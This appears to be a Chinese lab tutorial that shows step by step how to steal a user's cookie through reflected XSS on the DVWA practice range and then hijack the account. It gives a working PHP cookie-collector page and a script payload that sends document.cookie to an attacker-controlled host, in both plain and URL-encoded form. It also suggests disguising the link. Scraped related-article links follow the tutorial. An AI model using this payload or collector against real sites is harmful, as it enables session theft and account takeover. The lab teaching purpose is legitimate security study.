流程:

第一步:搭建用于接收cookie的web站点。
第二步:构建恶意链接发送给用户。
第三步:用户点击恶意链接,目标网站返回带有恶意代码的web页面。
第四步:浏览器解析web页面,执行恶意代码,跳转到搭建的web站点。
第五步:从搭建的web站点中获取用户cookie。

准备

靶场:dvwa
工具:burpsuite,kali虚拟机

第一步

***搭建我们的web站点,用来接收用户cookie。***
这里我用kali来模拟,打开我的kali虚拟机,开启apache服务,进入/var/www/html文件,写一个用来接收cookie的网页,代码如下:
<?php$a=$_GET["cookie"];$file=fopen("gtck.html","a") or exit("</br>未找到文件!");fwrite($file,$a."</br>");fclose($file);
?>
很简单的一个网页主要用来接收用户cookie,然后写入gtck.html文件里,然后我们在创建gtck.html文件,用来保存用户cookie。

之后还有很重要的一件事,我们要给这两个文件改一下权限,不然会导致写入不成功,用户传来的cookie我们无法保存,
首先为我们要查看一下运行apache的用户名,然后更改两个文件的权限。
ps -axu | grep apache #查看运行apache的用户名
chown www-data:www-data xssgc.php gtck.html # 更改文件权限

浏览器访问http://192.168.0.109/xssgc.php?cookie=1,看看传入的值有没有保存在gtck.html里。


可以看到写入成功了,第一步完成。

第二步:

***构建恶意链接发送给用户。***
我们登录dvwa,将难度调到low,然后选择反射型xss:

我们知道这里存在反射型xss漏洞,所以我们直接构建恶意代码:
<script>document.location='http://192.168.0.109/xssgc.php?cookie='+document.cookie</script>
这行代码也很简单,就是加载后转到我们搭建的web网页,向我们的网页传入用户的cookie,document.location='url'起到页面加载后转到
我们网页的作用,document.cookie起到获取用户cookie的作用,那么拼接上dvwa的url就是:
http://192.168.0.107/DVWA-master/vulnerabilities/xss_r/?name=<script>document.location='http://192.168.0.109/xssgc.php?cookie='+document.cookie</script>
但是url里直接有代码就很明显,而且有时还会出错,所以我们要对payload进行url编码。
打开burp,选择decoder选项,输入我们的payload,选择url编码。
(当然也可以在一些在线编码网站上进行编码)

将编码后的paylod复制下来,然后拼接上url:
http://192.168.0.107/DVWA-master/vulnerabilities/xss_r/?name=%3c%73%63%72%69%70%74%3e%64%6f%63%75%6d%65%6e%74%2e%6c%6f%63%61%74%69%6f%6e%3d%27%68%74%74%70%3a%2f%2f%31%39%32%2e%31%36%38%2e%30%2e%31%30%39%2f%78%73%73%67%63%2e%70%68%70%3f%63%6f%6f%6b%69%65%3d%27%2b%64%6f%63%75%6d%65a%6e%74%2e%63%6f%6f%6b%69%65%3c%2f%73%63%72%69%70%74%3e
这就是最后完整的url,我们还可以对其伪造一下,列如短链接啥的,不过只是为了演示这儿就不弄了。

第三步:

***将恶意链接发送给用户,用户点击。***
我们在物理机上用另一个账号登录dvwa,登录昵称为1337。

然后点击我们的恶意链接,模拟用户点击。

我们发现页面跳转到了我们准备的web网页,去kali看一下有没有保存到cookie:

保存成功!!

第四步:通过cookie更改账户

我们回到admin这个账户上,通过f12更改cookie,将cookie改为我们刚获取到的用户的cookie。

然后刷新一下。

可以看到我们的用户变为了1337。

反射型xss钓鱼盗取用户cookie相关推荐

  1. xss漏洞-DVWA跨站攻击盗取用户cookie值

    程Kaedy.cn-www.kaedy.cn XSS跨站脚本攻击介绍 跨站脚本攻击英文全称为(Cross site Script)缩写为 CSS,但是为了和层叠样式表(Cascading Style ...

  2. 2021-09-01 网安实验-XSS-存储型XSS获取用户cookie

    一:存储型XSS 1.保存用户cookie 我们可以通过JS,构造一个请求,来请求一个我们有权限的页面,在构造请求的时候,把用户的cookie当作参数传过去,然后我们就可以在这个页面里,接收传过来的参 ...

  3. 反射型xss(跨站脚本攻击)

    反射型xss(跨站脚本攻击) 通常人们会把跨站脚本攻击(Cross Site Scripting)缩写为CSS),但是这与浏览器的层叠样式表css会混淆,所以人们把跨站脚本攻击缩写为xss. xss原 ...

  4. 反射型XSS,存储型XSS,Dom型XSS,如何获取cookie,XSS钓鱼,XSS获取键盘记录

    XSS: 反射型XSS,存储型XSS,Dom型XSS,如何获取cookie,XSS钓鱼,XSS获取键盘记录 一.跨站脚本漏洞(XSS) XSS漏洞一直被评估为web漏洞中危害较大的漏洞 XSS是一种发 ...

  5. php反射型xss,利用反射型XSS漏洞,模拟获取登录账户的Cookie

    目录结构 一.测试环境 二.测试目标 三.原理描述 四.操作步骤 1.在服务器上搭建并启用hacker测试网站 2.在服务器上测试站点根目录内创建一个存放攻击脚本的文件夹 3.在xss文件夹下创建攻击 ...

  6. 三个臭皮匠浅谈xss获取用户cookie的安全漏洞

    利用别人的cookie,他们可以冒充真实的用户,在颁发cookie的那个网站中为所欲为,个人隐私在他们面前根本不存在. 接下来这篇文章以3个兄弟之间的对话进行讲解. 运气好的话连别人的用户名和密码都能 ...

  7. 最新钓鱼网站假扮Office 365 信箱 恐会盗取用户密码

    网站 Bleeping Computer 先前报导,近日网络出现新钓鱼邮件,不法分子发送假扮 Office 365 无法送出邮件的提示信,尝试盗取用户的密码.最先由 ISC Handler 的 Xav ...

  8. 【Web安全】XSS简介与XSS测试平台截取用户COOKIE的探索

    文章目录 1 XSS简介 2 XSS分类 3 XSS原理演示 4 XSS测试平台使用 4.1 指引文档 4.2 勾选默认模块测试成功的返回值 1 XSS简介 百度百科的解释: XSS又叫CSS (Cr ...

  9. 反射型XSS漏洞详解

    反射型XSS漏洞 如果一个应用程序使用动态页面向用户显示错误消息,就会造成一种常见的XSS漏洞.通常,该页面会使用一个包含消息文本的参数,并在响应中将这个文 本返回给用户.对于开发者而言,使用这种机制 ...

最新文章

  1. java连接mongodb_java连接mongodb源码解读
  2. linux差分备份,完全和差分备份的自动化模型
  3. 创建可微物理引擎Nimble,开源SOTA人体骨骼模型,斯坦福腿疾博士生用AI「助跑」人生...
  4. ActionScript 3.0 Step By Step系列(五):走在面向对象开发的路上,以类为基础去思考编程问题...
  5. 欣喜若狂--成功的第一步
  6. [转]C#与数据结构--树论--平衡二叉树(AVL Tree)
  7. 非文学翻译理论与实践_北外“欧洲非通用语文学翻译与研究中心”正式成立
  8. 【python学习】——读取csv文件
  9. 随笔-机器如何学习我们的知识?
  10. ubuntu动态截图(GIF动画)
  11. php while 语录,PHP While 循环
  12. OpenShift - 扩展收缩应用部署规模
  13. 500万相机芯片尺寸_MGS二代系列500万像素新品面世
  14. LibreOJ #6014. 「网络流 24 题」最长 k 可重区间集
  15. 3cd修改tftp服务器地址,模式tftp服务器是什么
  16. svn多分支开发合并技巧(idea or tortoiseSVN)
  17. 网络词汇泛滥:神马都是浮云?
  18. PMP 项目质量管理
  19. AOJ-proble-807
  20. loadrunne-- Analysis 分析器

热门文章

  1. mysql中clog_Colg论坛
  2. python学习基础篇Day08(P85~~95)
  3. android 横向更多,改变传统打造视觉盛宴 Android四大桌面横向对比
  4. “守、攻、抢”配送机器人市场的“神仙打架”
  5. python 解压的几种方法
  6. 接入谷歌的语音识别(speech-to-text)
  7. ckeditor直接粘贴图片实现
  8. 苹果成功秘诀:十大关键因素导致与众不同(转)
  9. 视频播放器MX Player Pro 目前最新长期更新
  10. excel首行固定_EXCEL 一个工作表如何快速拆分多个工作表的方法